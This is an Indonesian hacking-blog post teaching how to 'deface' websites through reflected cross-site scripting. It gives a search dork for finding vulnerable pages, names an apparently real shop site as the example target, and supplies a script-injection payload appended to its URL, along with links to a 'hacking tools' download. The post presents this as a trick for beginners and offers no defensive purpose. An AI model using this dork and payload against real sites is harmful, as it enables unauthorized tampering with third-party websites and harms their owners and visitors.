Cara Deface Website Metode XSS Vulnerability

Cara Deface Website Metode XSS Vulnerability

Pengertian XSS

XSS merupakan kependekan yang digunakan untuk istilah cross site scripting.

XSS merupakan salah satu jenis serangan injeksi code (code injection attack). XSS dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script code lainnya ke suatu situs. Serangan ini akan seolah-olah datang dari situs tersebut. Akibat serangan ini antara lain penyerang dapat mem-bypass keamanan di sisi klien, mendapatkan informasi sensitif, atau menyimpan aplikasi berbahaya.

Alasan kependekan yang digunakan XSS bukan CSS karena CSS sudah digunakan untuk cascade style sheet.

Dork XSS

Dork XSS yang masih work sampai saat ini.

inurl:"/showcatrows.php?CategoryID="

Langkah Deface dengan XSS

1. Pertama Copy Dork yang telah gw sediain, paste and search di browser tercinta anda :D, kemudian akan ada banyak targe tuh yang sesuai dengan Dorknya, pilih salah satu target dan buka di tab baru :D

Cara Deface Website Metode XSS Vulnerability

2. Ok ini contoh web target saya dengan URL seperti dibawah ini.

http://www.paypalshop.org/showcatrows.php?CategoryID=5

Cara Deface Website Metode XSS Vulnerability

3. Kemudian tambahkan script dibawah ini diURL paling belakang.

"><marquee><h1>DEFACED BY PRINGSEWU CYBER TEAM</h1></marquee>

Contoh

http://www.paypalshop.org/showcatrows.php?CategoryID=5"><marquee><h1>DEFACED BY PRINGSEWU CYBER TEAM</h1></marquee>

Warna Hitam adalah URL asli dan warna Merah adalah Script XSS kita :D

Cara Deface Website Metode XSS Vulnerability

Trik yang sangat simple, semoga bermanfaat dan Stay in My Blog.

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]

Download Kumpulan Tools Hacking 100% Work

[ DOWNLOAD ] - [ DOWNLOAD ]

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share

>> Facebook          **    Jack Shredder

>> Instagram          **    /abdur.rozak.mw

>> Twitter          **    @JackTersakiti

>> Youtube        **   Pringsewu Cyber Team

>> BBM           **   57318B69

// Why So Serious...